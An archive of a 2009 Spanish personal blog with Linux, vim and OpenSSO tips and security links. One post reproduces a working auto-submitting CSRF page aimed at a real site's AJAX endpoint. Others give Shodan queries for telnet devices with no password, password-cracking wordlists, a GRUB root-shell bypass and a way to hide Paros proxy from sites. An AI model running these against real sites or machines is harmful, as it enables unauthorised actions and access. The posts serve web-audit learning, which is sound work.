Google
 

miércoles, 30 de diciembre de 2009

INTECO-CERT videos graciosos

INTECO-CERT esta creando unos videos promocionales para darse a conocer, ya llevan 3 hechos y a cada cual más friki. Son para verlos :


Los virus atacan de nuevo:




Acaba con el SPAM:



Y el mejor, Phising:


Seguro que son trabajadores de la empresa xD

jueves, 24 de diciembre de 2009

CSRF mediante POST en Aplicaciones web AJAX


Buenas

Leyendo la lista webappsec de securityfocus.com alguien preguntaba cómo se podía hacer CSRF mediante POST. Cuando estube haciendo una auditoría web tuve problemas para realizar esto mismo, CSRF mediante POST en Aplicaciones web AJAX donde no se utiliza el típico formulario con los pares nombre = valor. La solución es crear un formulario con nombre vacío y valor, el JSON o el formato AJAX que la aplicación necesite.

http://blog.runxc.com/post/2009/07/06/CSRF-by-Example-How-to-do-it-How-to-defend-it.aspx

En la web ponen el siguiente ejemplo:

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1" runat="server">
    <title>RunXc CSRF example</title>
    <script type="text/javascript" 
    src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
    <script type="text/javascript">
        $(document).ready(function() {
        var kickit = location.search.substring(4);
        $('#hidDiv').html(
             '<form name="csrf" id="csrf" ' +
             'action="http://dotnetkicks.com/services/ajax/ajaxservices.ashx" method="post">' +
             ' <input type="hidden" name="" value=' + "'" + 
             '{"id":1,"method":"kickStory","params":['+ kickit +',true]}' + "'" + '/>' +
             ' </form>');
            document.getElementById("csrf").submit();
        });

    </script>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    </div>
    </form>
     <div id="hidDiv" style="display:none;">
     </div>
</body>
</html>


Luego se podría incluir un iframe que lance ese código.

David

sábado, 19 de diciembre de 2009

Más recomendaciones

Pŕacticamente debería de ser una especie de mirror de cyberhades, porque últimamente tienen posts muy interesantes, ahí van los últimos:


PD: Abro una nueva etiqueta para aglutinar todas las referencias a todo el material destacable

David

viernes, 18 de diciembre de 2009

Vim, un mundo de buffers


Buenas

llevaba tiempo molesto porque cada vez que borraba una línea en vim, perdía lo último que había copiado. Al final, haciendo un poco de caso al editor me entero de que en vi todo funciona mediante 'buffers'. Cuando abres un archivo va un buffer, cuando abres otro con la pantalla divida va a otro, cuando copias/mueves/borras algo va a un buffer. Por eso cuando 1º copiaba y luego borraba se reemplaza el contenido del buffer. Para solucionarlo:

Hay que copiar guardando el contenido en un buffer con nombre mediante las comillas dobles, es decir, para copiar una línea existente hay que: "aVy

Con esa secuencia le indico a Vim que entre en modo visual y copie la linea actual a un buffer llamado a.

Por cierto, ahí va una chuleta de comandos de Vi


David

Configuración por defecto

Buenass

últimamente( y siempre) estoy en la línea de recomendar entradas de blogs que leo y me parecen interesantes, en este caso en el blog de equilibrioinestable tiene una entrada sobre la configuración por defecto donde expone entre otros que en los servidores apache incluyen el server-status y server-info proporcionando información de más.

David

xkill - mata procesos de forma gráfica

Buenas

leyendo el blog de cyberhades encuentro una entrada sobre formas de matar los procesos en Linux como son:
  • kill
  • pkill
y aparece una que no conocía:
  • xkill
Sirve para procesos con interfaz gráfica y consiste en matar el proceso pinchando en su ventana, cuando se ejecuta el comando el icono cambiará, en mi caso a una calavera.


David

jueves, 17 de diciembre de 2009

Información confidencial en la empresa

Buenas

os aconsejo una entrada del blog securityartwork.es acerca de el robo de información confidencial y su castigo.
http://www.securityartwork.es/2009/12/09/seguridad-organizativa-un-caso-practico/

¿Y tu empresa como está?

OpenSSO y el cliente SDK

Buenas

hace unos días tuve un problema con OpenSSO que por lo visto es común pero ¡no avisan!. El caso es que estaba configurando SAE para el intercambio de información entre un IDP y un SP. Tengo configurado en una máquina con Glassfish un OpenSSO que hace de IDP y en otra máquina un OpenSSO que hace de SP.


En la máquina SP además quería alojar la aplicación web pero al contener el cliente SDK de OpenSSO me daba una excepción java.lang.NoClassDefFoundError: com/sun/identity/sae/api/SecureAttrs , el problema es que esa clase se estaba definiendo dos veces una por el war del OpenSSO SP y otra con el cliente SDK, así que la solución fue crear 2 dominios en Glassfish para separarlos.

$> asadmin create-domain --adminport 5850 --user admin --domaindir /home/david/glassfishv2/ domain2

David

martes, 8 de diciembre de 2009

Metadatos en imagenes para Linux

Buenas,

necesitaba subir unas fotos a Interné y quería borrar los metadatos (exif) no porque contuviera imagenes raras sino porque muestran demasiados datos.

En este blog hay un post que lo describe muy bien.
Para borrar todos los metadatos usé:

$ exiv2 -d a imagen.jpg

David

jueves, 3 de diciembre de 2009

Shodan, un buscador rarito


Para que no quede en el olvido aquí dejo el enlace al buscado shodan http://shodan.surtri.com/, que permite hacer busquedas de equipos conectados a internet. Se basa en las cabeceras para devolver los resultados.

Mas info: http://www.securitybydefault.com/2009/11/shodan-un-buscador-diferente.html

Busquedas:
  • camera country:ES <-- Visto en Comentarios de SBD
  • http://shodan.surtri.com/?q=port%3A23++Password+is+not+set+ <-- Devuelve resultados de Impresoras HP. Visto en twitter de aramosf
  • iis 4.0
  • http://blog.48bits.com/?p=767
Muy interesante!!!

David

Traceroute by SecurityArtWork

Leyendo el blog securityartwork veo una entrada sobre hacer traceroute para cualquier sistema con un puerto disponible. De esta forma se saltan restricciones impuestas por firewall al utilizar el clásico traceroute por ICMP.

Se utiliza la herramienta Layer Four Traceroute(lft):

# lft -d 80 servidor_web

Más en Curiosidades del Traceroute - securityartwork

Hace ya tiempo hablé de traceroute con hping3

David

lunes, 30 de noviembre de 2009

Reduce el tamaño de una imagen con Krita

Buenass

Necesitaba reducir el tamaño de unas imágenes para enviarlas por correo, así que una opción es reducir el tamaño de la foto.

Con krita:

Image --> Change Image Size

Desde este panel se define el tamaño de la foto.

David

miércoles, 25 de noviembre de 2009

Introducción a Fuzzing por S21Sec

Buenass

tenía pendiente la lectura de un post de S12Sec donde introducen el concepto de Fuzzing. Me ha gustado así que ahí va:

S21Sec: Fuzzing y Seguridad

Enlace al documento pdf Fuzzing y Seguridad

David

jueves, 19 de noviembre de 2009

OpenSSO en Glassfish

Buenas

estoy instalando OpenSSO Express 8 en Glassfish con el war opensso.war y da problemas si tienes un idioma diferente al inglés. Así que hay que cambiar el locale del SO y decirle que utilize en_US. Es un bug de OpenDS conocido desde la versión 7.

Da un error del estilo a:
category=CONFIG severity=SEVERE_ERROR msgID=3407988
msg=An error occurred while trying to initialize a backend loaded from class
org.opends.server.backends.TrustStoreBackend with the information in
configuration entry ds-cfg-backend-id=ads-truststore,cn=Backends,cn=config:
Error while attempting to generate a self-signed certificate ads-certificate in
the trust store file config/ads-truststore: KeyStoreException(Multi-prompt
didn't match: La contraseña del certificado ads-certificate no coincide )
(TrustStoreBackend.java:1897 TrustStoreBackend.java:359
BackendConfigManager.java:1298 BackendConfigManager.java:279
DirectoryServer.java:2555 DirectoryServer.java:1358 EmbeddedUtils.java:89
EmbeddedOpenDS.java:263 EmbeddedOpenDS.java:198 AMSetupServlet.java:513
AMSetupServlet.java:569 AMSetupServlet.java:645 AMSetupServlet.java:360
DefaultSummary.java:110 NativeMethodAccessorImpl.java:-2
NativeMethodAccessorImpl.java:39 DelegatingMethodAccessorImpl.java:25
Method.java:597 ClickUtils.java:1393 ActionLink.java:498 ClickServlet.java:555
...). This backend will be disabled
Para solucionarlo:
# vim /etc/default/locale
LANG="en_US.UTF-8"

Reiniciamos y la siguiente vez que intentemos instalar OpenSSO no dará problemas

Tutorial para la instalación de OpenSSO

David

Software básico de seguridad para Windows (II) según Securitybydefault

Leyendo securitybydefault han escrito una entrada parecida a la que comenté hace un par de meses de la compañía S21Sec. Así tenemos más opciones para elegir:

Software básico de seguridad para Windows (I) - S21Sec
Software básico de seguridad para Windows (II) - SecurityByDefault

David

miércoles, 18 de noviembre de 2009

Metasploit - El framework

Metasploit

Con la salida de la nueva versión 3.3 del framework de Metasploit voy a dejar una entrada no parar anunciar la nueva versión sino para recordar que existe un tutorial de Offensive Security donde enseñan a utilizarlo.
¡Cuando haya tiempo hay que echarle un ojo!

Tutorial Metasploit

David

sábado, 14 de noviembre de 2009

Mini Tutorial cURL

Volviendo a las andadas con Perl - curl - ... para el manejo de peticiones web. He encontrado un mini tutorial básico sobre curl

http://curl.haxx.se/docs/httpscripting.html

David

lunes, 9 de noviembre de 2009

Oracle SCHEMA, información de la base de datos

Oracle, al igual que MySQL tiene su especie de INFORMATION SCHEMA. Para Oracle hay tres tipos de información:
  • dba, referente a toda la base de datos
  • all, referente a todo lo que el usuario puede ver
  • user, referente a todo lo que es propiedad del usuario
Se pueden ver información de las tablas en esos niveles:
DBA_TABLES - tablas de toda la base de datos
ALL_TABLES - todas las tablas que el usuario puede ver
USER_TABLES - todas las tablas que son propiedad del usuario

También hay información sobre las columnas:
DBA_TAB_COLUMNS, ALL_TAB_COLUMNS, USER_TAB_COLUMNS

Infomración sobre Integridad, vistas, secuencias:
DBA_CONSTRAINTS, ALL_CONSTRAINTS, USER_CONSTRAINTS
DBA_CONS_COLUMNS, ALL_CONS_COLUMNS, USER_CONS_COLUMNS
DBA_VIEWS, ALL_VIEWS, USER_VIEWS
DBA_SEQUENCES, ALL_SEQUENCES, USER_SEQUENCES

Referencias: www.rafaelaroca.hpg.com.br

David

sábado, 7 de noviembre de 2009

Montar una imagen ISO con mount

Si nos hemos bajado una iso y queremos montarla antes de grabarla se puede hacer fácilmente desde Linux con el comando mount

# mount -t iso9660 -o loop archivo.iso /ruta/donde/montar

Con iso9660 se especifica 'el sistema de archivos', pero lo más curioso es la opción loop. Sirve para que monte el dispositivo como de bloques para así permitir la lectura y escritura de datos que es lo que entienden las funciones de Linux.

Mas info sobre loop en wikipedia

David

jueves, 5 de noviembre de 2009

Una ayudita para nuestro blog

Desde digitalInspiration han creado una web que permite generar el sitemap de nuestro blog de blogger y enviarlo a Google, Yahoo y Bing. Ya de paso por Google Webmaster Tools he visto que generan estadísticas sobre:
  • Top search queries - te dice la consulta y la posición en los resultados de Google. Curioso
  • Links to your site
Mientras escribo esta entrada, de mis 115 post del blog ya ha indexado 97!. Así que, una ayudita para nuestro blog nunca viene mal.

David

martes, 3 de noviembre de 2009

Dividir un video en dos partes

Actualización: Este método te permite dividir videos pero solo te toma un canal de sonido, así que adiós al dual. Cuando tenga tiempo y encuentre la forma de dividir el video con sonido dual lo pondre en el blog.

Últimamente estoy intentando ver videos en inglés así que suelo tener los videos en dual (inglés-español) lo que supone que los archivos tengan un gran tamaño.
Para dividir un video en dos partes es necesario tener mencoder, se puede conseguir desde los repositorios.

$> mencoder video.avi -ovc copy -oac copy -ss 00:00:00 -endpos 01:09:05 -o archivo1.avi

las opciones copy significa que no queremos que codifique el video, simplemente copiarlo, y los tiempos son el rango a copiar.

David

sábado, 31 de octubre de 2009

¿AES-128 rompible?

Leyendo un post del blog de S21Sec donde se habla de supercomputadores y lo comparan con la potencia de una botnet se me ocurrió que qué pasaría si se utiliza esa potencia de cómputo para intentar romper un cifrado AES-128 bits.
Se lo escribí en los comentarios y Guzmán Santafé, el autor del post, muy amable me dijo que escribiría otro post para resolverme mi duda. Y en una semana tenía mi duda resulta en el post Rompamos AES-128. Yo no puedo y tu? ... tampoco.
Además, en los comentarios de este último post un anónimo preguntó por qué las claves RSA son más grandes que en el cifrado simétrico y como respuesta tuvo un enlace a una web donde lo explican muy bien. Desmitificando RSA de 1025 bits.

Ahí tenéis un par de buenas lecturas

David

miércoles, 28 de octubre de 2009

Libros OWASP

Prácticamente de OWASP sólo conocía la Guía de pruebas (Testing Guide) pero tienen una web donde están publicados todos sus libros, hay un montón:


Se pueden comprar como libro o descargar en formato electrónico, así que habrá que sacar tiempo para echarles un ojo

Libros OWASP

David

martes, 27 de octubre de 2009

Teoría del Anonimato - SET 38

Un poco al hilo de lo que ha pasado con la web busindre.com que ha sido cerrada por orden jucidical se puede leer en una noticia del periodico 20 minutos que dice que se les ha cogido porque realizaban los ataques desde la línea telefónica de casa. Me cuesta creer esto no sé de donde habrán sacado la información.

Hace un par de días con la salida del e-zine SET nº 38, leí entre sus artículos uno sobre el anonimato, es el sexto artículo : Anonimato: Fantasmas en la Red
Versa sobre la teoría del anonimato, muy recomendable. Trata aspectos que hubieran evitado la caída de busindre.

David

lunes, 26 de octubre de 2009

Criptovirología por S21Sec

Acabo de leer una entrada muy interesante sobre la criptografía orientada al malware y sobre puertas traseras en algoritmos criptográficos en el blog de S21Sec.

David

Busindre ha caído

Como de vez en cuando, iba a conectarme a ver que había de nuevo por busindre.com y me he llevado la sorpresa al ver:

SITIO WEB CERRADO POR ORDEN JUDICIAL

Parece ser que después de hacer tanto ruido han dado con él, si buscamos en google 'hacked by busindre' salen unos cuantos resultados, además si miramos en zone-h hay contabilizados 289 ataques.

En el periódico Publico hablán de ello

La verdad es una pena porque publicaban contenidos en español bastante buenos y por simplemente hacer unos deface se la han jugado.

David

domingo, 25 de octubre de 2009

lunes, 19 de octubre de 2009

[Peliculas] La conspiración del pánico

Ayer me ví la película 'La conspiración del pánico' con título original 'Eagle eye' la película tiene una trama que para los lectores de este blog, si es que hay alguno xD, seguro os gustará. Da que pensar si trabajas en algo relacionado con la informatica.

viernes, 16 de octubre de 2009

Apt-build, optimiza tus programas!

Leyendo un artículo de la revista TodoLinux, para la que como os comenté estoy escribiendo, sobre el conjunto de herramientas apt. Hacen un listado de varias herramientas que entre otras existe apt-build. Te permite, con la misma facilidad que con apt-get, instalar un paquete pero previamente siendo compilado y optimizado para tu arquitectura:
Ventaja --> Más rápido en su ejecución
Inconveniente --> La compilación tarda

He encontrado una web donde detallan un poco más esto del apt-build

David

Colaborando para TodoLinux

Buenas

Después de unas duras,lentas, fastidiadas, incompresibles malas relaciones con una redactora jefe de otra revista de Linux ( no española ) que prefiero no hablar, no por mí culpa sino porque pasaban de sus colaboradores. He dado un giro para entrar en la revista TodoLinux. En su número 107 hay un artículo mío sobre copias de seguridad. De momento el trato con la revista es bueno, me han dado una direccion de correo bajo su dominio con la que contactar a los lectores.

Es mi primera colaboración en esta revista asi que todavía estais a tiempo para comprarla.

Un saludo,
David

[Crypto] Key size

Hi,

Yesterday, I read an article about the size of the key used in a cryptographic algorithm at wikipedia. It's very usefull, I recommend it!

Key size

bye

David

Pd: La versión en español del artículo de la wikipedia ( Longitud de la clave ) no es ni la sombra del que está en inglés, asi que todos a leer en inglés!

jueves, 8 de octubre de 2009

Webcam en K Ubuntu Microdia SN9C110

Buenass

parece que el tema de las webcam ha mejorado bastante en linux, mientras que hace un año mi webcam no funcionaba y sólo habia soporte para unas pocas esto ha cambiado. Mi webcam de la marca EMTEC cuando hago dmesg me muestra:

$ dmesg
usb 2-1: new full speed USB device using uhci_hcd and address 2
usb 2-1: configuration #1 chosen from 1 choice
gspca: probing 0c45:612a
sonixj: Sonix chip id: 12
gspca: probe ok
usbcore: registered new interface driver sonixj
sonixj: registered

y con lsusb:
$ lsusb
Microdia PC Camera (SN9C110)

Para que funcione la camara es necesario añadir el repositorio, en /etc/apt/sources.list:
deb http://ppa.launchpad.net/nickel62metal/ubuntu jaunty main

Añadimos la clave GPG:
# apt-key adv --recv-keys --keyserver keyserver.ubuntu.com 31CCA643CC60BA1F

# apt-get update;apt-get install microdia-dkms

Con ese paquete instalaremos los drivers de las webcam.

Para usarlo en skype, y quizá en otros programas se necesite hacer lo mismo:

Se crea el archivo /usr/local/bin/skype con lo siguiente:

# vim /usr/local/bin/skype
#!/bin/bash
LD_PRELOAD=/usr/lib/libv4l/v4l1compat.so /usr/bin/skype

#

Ya puse un post para saber que es LD_PRELOAD.

Con esto mi webcam ya funciona en skype!

David

Fuentes: ubuntuforums

martes, 6 de octubre de 2009

Dos monitores con dual-head no modo clonar en K Ubuntu

Buenas

como la pantalla de mi portátil se me ha quedado un poco pequeña para tanta ventana y aprovechando que tenía un monitor de 17 pulgadas Philips 107E6 de sobra lo voy a aprovechar para utilizar dos monitores en modo dual-head, es decir, no en modo clonar sino que cada monitor tenga sus propias ventanas.

Después de leer varios how-to he encontrado uno bueno de la mano de los queseros de CRySoL en una de sus recetas: Dos monitores (dual-head) con xrand.

Pues eso, en resumen hace uso de la herramienta xrand los pasos resumidos para mi configuración son:

$ xrandr
Screen 0: minimum 320 x 200, current 1280 x 800, maximum 2304 x 800
VGA-0 connected (normal left inverted right x axis y axis)
1024x768 85.0 75.0 70.1 60.0
832x624 74.6
800x600 100.0 85.1 72.2 75.0 60.3
640x480 100.0 85.0 75.0 72.8 59.9
720x400 70.1
640x350 70.1
LVDS connected 1280x800+0+0 (normal left inverted right x axis y axis) 331mm x 207mm
1280x800 60.0*+ 50.0
1280x720 59.9
1152x768 59.8
1024x768 59.9
800x600 59.9
640x480 59.4

$ xrandr --output VGA-0 --mode 1024x768 --right-of LVDS

De esta forma ponemos al dispositivo VGA-0 (el monitor Philips) una resolucion de 1024x768 y establecemos que la tenemos a la derecha de la pantalla del portatil. Esto significa que para ir a ese monitor llevamos el ratón a la derecha.

Si nos da un error del estilo a:
xrandr: screen cannot be larger than 2304x800 (desired size 1280x800)

Como me pasó a mí, hay que editar el archivo xorg.conf y añadir a la sección Screen lo siguiente:
SubSection "Display"
Modes "1280×800" "1024×768"
Virtual 2304 800
EndSubSection

En modes pones los modos que vas a utilizar, yo puesto el del portatil y el del monitor.
En Virtual pones la suma de las X y el mayor de las Y. WTF! ,es decir, 2304 = 1280+1024 y 800=max(800,768)
Ahí cada cual que eche sus números.

Al final para mí quedo así:
# vim /etc/X11/xorg.conf

Section "Screen"
Identifier "Default Screen"
Monitor "Configured Monitor"
Device "Configured Video Device"
SubSection "Display"
Modes "1280*800" "1024*768"
Virtual 2304 800
EndSubSection
EndSection

David

lunes, 5 de octubre de 2009

Reversing de 48Bits

Para quién se entere de algo, yo en esos temas todavía no he entrado pero aquí un buen post con herramientas de 48Bits.

Cobertura de código, herramientas y ejemplos

David

martes, 29 de septiembre de 2009

Paros proxy, nouseragent

Por Julio, escribí un post sobre cómo eliminar el user-agent de paros proxy y comenté que este no tenía una opción para que no añadiese al User-Agent una cadena con el nombre y versión de Paros. Bien, pues esto no es correcto, simplemente con escribir:

$> paros --nouseragent

(Hay dos guiones juntos --) Es suficiente para eliminar dicha cadena. Lo podéis comprobar realizando una captura con wireshark.

David

miércoles, 2 de septiembre de 2009

OpenOffice link a imagenes

Para el post número 100, una entrada sobre OpenOffice acerca de una característica que no estaba gustando. La característica es que OpenOffice no guarda las imágenes que se copien de páginas web lo que hace es que cada vez que te habras el documento se descarga la imágen. ¿Y esto para qué?Pues para que ocupe menos el documento. Pero, ¿qué pasa cuando no hay internet o cuando la web desde la que estaba enlazada la imagen está caída?Pues que te quedas sin ver la imagen. Para evitar esto, hay que decirle a OpenOffice que guarde las imagenes. Tan fácil como Edit --> links. Seleccionas los enlaces y pulsas en Break link

David

Conferencias famosas - CFP

Viendo el blog de el maligno, tiene una entrada con el resumen de las proximas conferencias donde se puede intentar participar, por si alguien se anima - atreve - puede xD


conferencias famosas - CFP

xkcd - Cryptography

No hay clave que se resista:

http://xkcd.com/538/

martes, 1 de septiembre de 2009

viernes, 21 de agosto de 2009

HTTPS asegurando nuestra conexión

He llegado a un blog que explican la conexión entre el cliente y el servidor cuando nos conectamos a una página con TLS/SSL.

The First Few Milliseconds of an HTTPS Connection

Está en inglés, explican todo el proceso detalladamente, RECOMENDADO.

En el segundo comentario, indican que se puede establecer en firefox que suite de cifrado queremos elegir podemos descartar, por ejemplo los que utilizan MD5, desde about:config. Si escribimos security.ssl en el filtro nos aparecerán todos los utilizados y ahí podemos elegir

David

jueves, 20 de agosto de 2009

Curso de Introduccion sobre Seguridad en Redes

Para los que necesiten una iniciación a la teoría sobre Seguridad en Redes hay un curso virtual en inglés.

Network Security

Hay más cursos que se pueden acceder on-line.

DavidEnlace

jueves, 13 de agosto de 2009

Instalar modulos en perl

Para probar la herramienta en Perl de securitybydefault para crackear certificados pkcs12 en sistemas Unix es necesario instalar el módulo Crypt::OpenSSL:PKCS12. Si no tienes ni idea de Perl, como yo, puedes encontrarte con una barrera para ejecutar la instalación si el módulo requiere de dependencias, como es en este caso. El módulo Crypt::OpenSSL:PKCS12 necesita libcrypto. Buscando no se encuentra nada parecido,asi que al final para la instalación instalé de los repositorios de Ubuntu el paquete libssl-dev, para resolver esta dependecia.

Para instalar modulos en Perl se puede de dos formas:
  • Automática
$> perl -MCPAN -e shell
> install <>
  • Manual
$> perl Makefile.PL
$> make
$> make test
#> make install


Intenté instalar de forma automática el módulo Crypt::OpenSSL:PKCS12 pero no me dejó asi que tuve que hacerlo de la forma manual.

jueves, 6 de agosto de 2009

Traceroute con TCP

En el blog de FungFooSion se puede ver la ventajas de realizar un traceroute con TCP frente a UDP.

root#> traceroute -n web

root#> hping3 -S -t 1 -p 80 -n -z web

En hping3, con el modificador -z hacemos que mediante CTRL-Z crezca el TTL

En mis pruebas con traceroute se perdían los paquetes mientras que con hping3 llegan hasta el host
David

Wordlists

Seguramente el camino de utilizar un ataque de diccionario no sea la mejor opción a la hora de sacar una contraseña pero si no se tiene ningún patrón quizá sea mejor que un ataque por fuerza bruta, el tiempo y la calidad del wordlist lo dirá

En esta web recopilan estos enlaces de wordlist:

Oxford Uni Wordlists
There’s a good set of lists here including many european languages and topic specific lists:
The Argon Wordlists
Here we have 50,000 words, common login/passwords and African words (this used to be a great resource):
Totse Word Lists
There’s a good French word list here with and without accents, also has some other languages including names:
Wordlists for bruteforce crackers
One of the most famous lists is still from Openwall (the home of John the Ripper) and now costs money for the full version:
Openwall Wordlists Collection
Openwall Free Version (Añadido por mí)

Some good lists here organized by topic:
Outpost9 Word lists
Packetstorm has some good topic based lists including sciences, religion, music, movies and common lists.
Packetstorm word lists

[Actualización] http://www.skullsecurity.org/wiki/index.php/Passwords by sbd


David

Extraer archivos de captura pcap manualmente (Wireshark, tcpdump)

Para extraer archivos pcap capturados con wireshark, tcpdump, ... desde Windows se puede utilizar la herramienta Network Miner, para linux tenemos tcpxtract pero suele dar fallos de segmentación por lo que he encontrado una web donde nos explican de foma muy sencilla como extraer los archivos de forma manual desde Wireshark.

Enlacehttp://sansforensics.wordpress.com/2009/03/10/pulling-binaries-from-pcaps/

Básicamente, los pasos son:
  1. Botón derecho en la petición GET del archivo que queremos
  2. Escogemos Follow TCP stream y nos muestra el dialogo seguido en esa petición
  3. Abajo escogemos la comunicación del servidor al cliente para obtener todos los paquetes del servidor.
  4. Pinchamos en Save as

  5. Estos son los pasos que se indican en el blog, pero en mi caso tuve que realizar otro más

  6. Abrir con un editor hexadecimal o con vim el archivo guardado y eliminar la cabecera http.
    $> vim -b captura

David

miércoles, 5 de agosto de 2009

Defcon 17 CTF Quals: Materiales y Soluciones

Viendo cosillas de la recién acabada Defcon y el nivelazo que se mueve por esos lugares he econtrado una web donde recogen las pruebas y soluciones.

http://g30rg3x.com/defcon-17-ctf-quals-materiales-y-soluciones/

Pd: ahora quien pueda que las entienda xD

martes, 4 de agosto de 2009

viernes, 31 de julio de 2009

Paros proxy, no user-agent

Buenas,

si usais Paros proxy en las peticiones os añadirá en el User-Agent Paros/3.2.13. El problema de esto es que hay ciertas paginas que no te dejan entrar por estar utilizando Paros. Sin embargo, Paros no tiene una opción para desactivar la inclusión de Paros/3.2.13 en el User-Agent. Lo que hay que hacer es:
  1. bajarse las fuentes de paros.http://www.parosproxy.org/
  2. Modificar el archivo \src\org\parosproxy\paros\Constant.java
    // public static final String USER_AGENT = PROGRAM_NAME + “/” + PROGRAM_VERSION;
    public static final String USER_AGENT = “”;
  3. Instalar ant
    #> apt-get install ant
  4. Ejecutar $> ant desde el directorio paros/build/

Cuando termine os habrá creado una carpeta con el nuevo paros.jar sin user-agent.

Referencias: http://www.cutawaysecurity.com/blog/archives/category/paros-proxy

viernes, 24 de julio de 2009

[tips]Editar menú en KDE4

A veces las cosas más sencillas las tenemos en frente y no las vemos. Esta vez intentando añadir aplicaciones en el menú de KDE 4. Pues es tan sencillo como botón derecho en la K y ahí tenemos Editor de menu.
David

[tips]Hacha en Linux con Dalle

Después de probar fallidamente hoz como aplicación para unir archivos, he probado Dalle y me ha funcionado.

Hacha en Linux

David

jueves, 9 de julio de 2009

MD5SUMS Ubuntu y Debian

Es recomendable verificar la firma md5/sha1 ... de las iso de la distribución que vamos a instalar. Como no está en la primera posición al buscar en Google el md5sum para Ubuntu y Debian aquí están los listados:

MD5SUM Ubuntu

MD5SUM Debian

miércoles, 8 de julio de 2009

Sudoers, sudo para reiniciar equipo

En distribuciones distintas a Ubuntu donde sudo no está por defecto, como en Debian, si queremos activarlo es necesario tocar /etc/sudoers con visudo. Aquí dejo un par de líneas para recordar mi configuración. Quizás le sirva también a alguien:

#> visudo

#Permitir al usuario urdiendo reiniciar y apagar el sistema
urdiendo ALL=(root)/usr/sbin/shutdown
urdiendo ALL=(root)/usr/sbin/reboot

#>

Con esto indicamos que el usuario puede ejecutar como root los programas shutdown y reboot.


Pd: Visudo se ejecutará con el editor de textos que tengáis por defecto. Si lo queréis modificar, en una entrada pasada lo configuré para utilizar visudo con vi


martes, 26 de mayo de 2009

GRUB: bash root

Buenass

Algo muy viejo y muy util cuando te cargas algo ( como el pam) y no puedes acceder con tus usuarios. Lo dejo aquí más a mano

Lo que se consigue es ejecutar un comando con privilegios de root, y nuestro comando va a ser la shell bash para ello:

Cuando se inicia grub:
  1. pulsamos 'e' para editar en la entrada de la lista de grub que queramos acceder
  2. buscamos 'ro' (readonly) y lo cambiamos por 'rw' (read-write)
  3. añadimos init=/bin/bash para que ejecute la shell
David

viernes, 8 de mayo de 2009

Scripts de arranque desde consola en Linux

De la mano del grupo CRySOL, tenemos una receta de como añadir nuevos scripts al inicio del sistema o de cómo quitar scripts del arranque del sistema.

Todo ello utilizando el comando update-rc.d

David

domingo, 26 de abril de 2009

Post de google sobre hacking

Buenass

Leyendo el boletín de segu-info, he llegado a un enlace del blog oficial de Google para Latinoamérica que trata de hacking en esos países.

casos de hacking por Google America Latina

La entrada tiene un nivel muy sencillo, fácil de entender y lo mejor, con enlaces a webs interesantes.

David

viernes, 24 de abril de 2009

Vectorizar, pasando imagenes a formato vectorial

Buenass

Ultimamente estoy tocando algo de imágenes y he necesitado vectorizar una imagen pequeña que tenia que se me pixelaba mucho. Lo que hice fue utilizar inkspace con la opción de Trazo -> vecotorizar mapa de bits. Pero ahora he encontrado una web que da muy buenos resultados:

vectormagic.com

Si necesitáis vectorizar una imágen, usadlo!

Un saludo

David

martes, 14 de abril de 2009

Visudo con VI

Ya que me estoy aficionando a vi, a la hora de utilizar Visudo para dar algunos permisos a mis usuarios me he encontrado con el editor era nano. Esto es así, porque visudo toma el editor por defecto y en mi caso era nano. Para actualizarlo:

#> update-alternatives --config editor

Saldrá una lista con los editores que podemos utilizar. Elegimos el número de VI, y la próxima vez que ejecutemos visudo, el editor será vi

David

lunes, 6 de abril de 2009

Formatear pendrive en Linux con mkfs

Una nota para acordarme del comando para formatear un pendrive desde linux compatible con Windows. Para ello, vamos a formatearlo en fat desde mi ubuntu, es necesario tener permisos de root.

#> mkfs.vfat -n <etiqueta> <dispositivo/partición>

En mi caso,
#> mkfs.vfat -n david /dev/sdb1

Para saber cuál es tu dispositivo puedes verlo con dmesg,

$> dmesg | tail
[ 7369.716628] sd 5:0:0:0: [sdb] Mode Sense: 03 00 00 00
[ 7369.716634] sd 5:0:0:0: [sdb] Assuming drive cache: write through
[ 7369.716645] sdb: sdb1
[ 7369.719799] sd 5:0:0:0: [sdb] Attached SCSI removable disk
[ 7369.720015] sd 5:0:0:0: Attached scsi generic sg2 type 0

O si quieres una partición en concreto, lo montas y consultas con fdisk la partición(sdb1-sdb2-...):
#> fdisk -l
Disco /dev/sdb: 4075 MB, 4075290624 bytes
7 cabezas, 6 sectores/pista, 189513 cilindros
Unidades = cilindros de 42 * 512 = 21504 bytes
Identificador de disco: 0x00000000

Disposit. Inicio Comienzo Fin Bloques Id Sistema
/dev/sdb1 196 189514 3975680 b W95 FAT32

Ten en cuenta que el dispositivo no tiene que estar montado, sino te mostrará el mensaje:
mkfs.vfat: /dev/sdb1 contains a mounted file system.

$> umount /dev/sdb1

lunes, 30 de marzo de 2009

Grabar macros en Vim

Supongo que cada vez soy un poco más friki por que me estoy acostumbrando a utilizar el editor Vim, y te das cuenta de que es muy potente.

Recuerdo que un día vi que existían unas macros para repetir instrucciones en el editor vi. Haciendo una simple busqueda vi este blog.

Yo lo utilize para dar un tabulado especifico y lo que hice fue:
  • q //entramos en modo grabar
  • a //etiqueta de la macro
  • I tab (abajo) //aqui ponemos las instrucciones que queremos que se ejecuten. En mi caso, I (para inserte al inicio de la linea), tab ( es el tabulador para que mueva la línea) y (abajo) que es la flecha de abajo para que se mueva de línea y así la próxima vez cambie de línea.
  • Esc
  • q //fin modo grabación
Ahora para poder ejecutarlo, le decimos el número de veces a ejecutar y la etiqueta de la macro:
  • 10@a //repetición de la macro 'a' 10 veces
  • @a // si solo queremos una vez

Espero que sea útil, por si se olvidan los pasos

David

viernes, 6 de febrero de 2009

Candado del navegar, mitos y leyendas desde Hispasec

Buenas

Tenía pendientes de leer, como otras miles de páginas, un par de correos de la lista de Hispasec una-al-dia que son:

Si no lo habéis leído todavía, hacedlo! El primero 'te pone al día' con certificados SSL y el segundo comenta algunas de las técnicas que se utilizan para usar SSL con troyanos.

David

sábado, 10 de enero de 2009

Mitos sobre batería de Li-ion

Cada vez que te compras un nuevo gadget, ya sea teléfono móvil, mp4, portatil y viene con batería te entran las dudas de ¿tendré que dejar días y días la batería cargando para su primera vez?¿se me estropeará si no lo hago?

Una pagina sencilla y concisa que responde a estas preguntas: Desmontando algunos mitos y leyendas sobre las baterias de li-ion

David